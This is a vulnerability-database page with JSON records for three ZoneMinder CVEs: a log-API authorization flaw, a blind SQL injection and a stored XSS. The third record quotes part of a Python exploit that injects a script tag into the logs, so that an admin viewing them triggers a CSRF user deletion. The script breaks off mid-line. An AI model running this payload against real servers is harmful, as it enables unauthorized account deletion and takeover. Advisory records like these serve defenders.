Search criteria
177 vulnerabilities found for zoneminder by ZoneMinder
VAR-202210-0275
Vulnerability from variot - Updated: 2025-01-30 22:05ZoneMinder is a free, open source Closed-circuit television software application. In affected versions the ZoneMinder API Exposes Database Log contents to user without privileges, allows insertion, modification, deletion of logs without System Privileges. Users are advised yo upgrade as soon as possible. Users unable to upgrade should disable database logging. ZoneMinder Exists in a vulnerability related to the lack of authentication.Information may be tampered with
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202210-0275",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.24"
},
{
"model": "zoneminder",
"scope": "lte",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.36.27"
},
{
"model": "zoneminder",
"scope": "gte",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.0"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": null,
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "lte",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.36.27 and earlier"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.37.0 that\u0027s all 1.37.24"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018649"
},
{
"db": "NVD",
"id": "CVE-2022-39289"
}
]
},
"cve": "CVE-2022-39289",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2022-39289",
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2022-39289",
"impactScore": 5.2,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2022-39289",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-39289",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2022-39289",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2022-39289",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202210-332",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018649"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-332"
},
{
"db": "NVD",
"id": "CVE-2022-39289"
},
{
"db": "NVD",
"id": "CVE-2022-39289"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder is a free, open source Closed-circuit television software application. In affected versions the ZoneMinder API Exposes Database Log contents to user without privileges, allows insertion, modification, deletion of logs without System Privileges. Users are advised yo upgrade as soon as possible. Users unable to upgrade should disable database logging. ZoneMinder Exists in a vulnerability related to the lack of authentication.Information may be tampered with",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-39289"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018649"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-39289",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018649",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202210-332",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018649"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-332"
},
{
"db": "NVD",
"id": "CVE-2022-39289"
}
]
},
"id": "VAR-202210-0275",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"home \u0026 office device"
],
"sub_category": "TV",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T22:05:01.937000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ZoneMinder Repair measures for information disclosure vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=210330"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-332"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-862",
"trust": 1.0
},
{
"problemtype": "CWE-200",
"trust": 1.0
},
{
"problemtype": "CWE-287",
"trust": 1.0
},
{
"problemtype": "Lack of authentication (CWE-862) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018649"
},
{
"db": "NVD",
"id": "CVE-2022-39289"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/34ffd92bf123070cab6c83ad4cfe6297dd0ed0b4"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/security/advisories/ghsa-mpcx-3gvh-9488"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39289"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-39289/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018649"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-332"
},
{
"db": "NVD",
"id": "CVE-2022-39289"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018649"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-332"
},
{
"db": "NVD",
"id": "CVE-2022-39289"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-018649"
},
{
"date": "2022-10-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-332"
},
{
"date": "2022-10-07T21:15:11.553000",
"db": "NVD",
"id": "CVE-2022-39289"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T08:27:00",
"db": "JVNDB",
"id": "JVNDB-2022-018649"
},
{
"date": "2023-07-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-332"
},
{
"date": "2023-07-14T18:13:15.957000",
"db": "NVD",
"id": "CVE-2022-39289"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-332"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder\u00a0 Vulnerability regarding lack of authentication in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018649"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-332"
}
],
"trust": 0.6
}
}
VAR-202302-1867
Vulnerability from variot - Updated: 2025-01-30 21:45ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are affected by a SQL Injection vulnerability. The (blind) SQL Injection vulnerability is present within the filter[Query][terms][0][attr] query string parameter of the /zm/index.php endpoint. A user with the View or Edit permissions of Events may execute arbitrary SQL. The resulting impact can include unauthorized data access (and modification), authentication and/or authorization bypass, and remote code execution. ZoneMinder for, SQL There is an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202302-1867",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zoneminder",
"scope": "gte",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.00"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.36.33"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.33"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.36.33"
},
{
"model": "zoneminder",
"scope": null,
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.37.00 that\u0027s all 1.37.33"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004650"
},
{
"db": "NVD",
"id": "CVE-2023-26034"
}
]
},
"cve": "CVE-2023-26034",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-26034",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "NONE",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.1,
"id": "CVE-2023-26034",
"impactScore": 5.8,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-26034",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2023-26034",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2023-26034",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2023-26034",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202302-2021",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004650"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2021"
},
{
"db": "NVD",
"id": "CVE-2023-26034"
},
{
"db": "NVD",
"id": "CVE-2023-26034"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are affected by a SQL Injection vulnerability. The (blind) SQL Injection vulnerability is present within the `filter[Query][terms][0][attr]` query string parameter of the `/zm/index.php` endpoint. A user with the View or Edit permissions of Events may execute arbitrary SQL. The resulting impact can include unauthorized data access (and modification), authentication and/or authorization bypass, and remote code execution. ZoneMinder for, SQL There is an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-26034"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004650"
},
{
"db": "VULMON",
"id": "CVE-2023-26034"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-26034",
"trust": 3.4
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004650",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2021",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2023-26034",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2023-26034"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004650"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2021"
},
{
"db": "NVD",
"id": "CVE-2023-26034"
}
]
},
"id": "VAR-202302-1867",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T21:45:57.650000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ZoneMinder SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=228057"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202302-2021"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.0
},
{
"problemtype": "SQL injection (CWE-89) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004650"
},
{
"db": "NVD",
"id": "CVE-2023-26034"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://github.com/zoneminder/zoneminder/security/advisories/ghsa-222j-wh8m-xjrx"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-26034"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-26034/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2023-26034"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004650"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2021"
},
{
"db": "NVD",
"id": "CVE-2023-26034"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2023-26034"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004650"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2021"
},
{
"db": "NVD",
"id": "CVE-2023-26034"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-25T00:00:00",
"db": "VULMON",
"id": "CVE-2023-26034"
},
{
"date": "2023-11-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-004650"
},
{
"date": "2023-02-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202302-2021"
},
{
"date": "2023-02-25T01:15:56.877000",
"db": "NVD",
"id": "CVE-2023-26034"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-26T00:00:00",
"db": "VULMON",
"id": "CVE-2023-26034"
},
{
"date": "2023-11-01T02:01:00",
"db": "JVNDB",
"id": "JVNDB-2023-004650"
},
{
"date": "2023-03-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202302-2021"
},
{
"date": "2023-11-07T04:09:17.447000",
"db": "NVD",
"id": "CVE-2023-26034"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202302-2021"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder\u00a0 In \u00a0SQL\u00a0 Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004650"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202302-2021"
}
],
"trust": 0.6
}
}
VAR-202210-0307
Vulnerability from variot - Updated: 2025-01-30 21:28ZoneMinder is a free, open source Closed-circuit television software application The file parameter is vulnerable to a cross site scripting vulnerability (XSS) by backing out of the current "tr" "td" brackets. This then allows a malicious user to provide code that will execute when a user views the specific log on the "view=log" page. This vulnerability allows an attacker to store code within the logs that will be executed when loaded by a legitimate user. These actions will be performed with the permission of the victim. This could lead to data loss and/or further exploitation including account takeover. This issue has been addressed in versions 1.36.27 and 1.37.24. Users are advised to upgrade. Users unable to upgrade should disable database logging. ZoneMinder Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. # Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS)
Date: 10/01/2022
Exploit Author: Trenches of IT
Vendor Homepage: https://github.com/ZoneMinder/zoneminder
Version: v1.36.26
Tested on: Linux/Windows
CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291
Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/
Proof of Concept:
1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)
2 - Admin user logs navigates to http:///zm/index.php?view=log
3 - XSS executes delete function on target UID (user).
import requests import re import time import argparse import sys
def getOptions(args=sys.argv[1:]): parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1") parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True) parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True) parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True) parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True) parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True) options = parser.parse_args(args) return options
options = getOptions(sys.argv[1:])
payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F<script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'"
Request to login and get the response headers
loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"} loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"} response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies) zmHeaders = response.headers try: zoneminderSession = 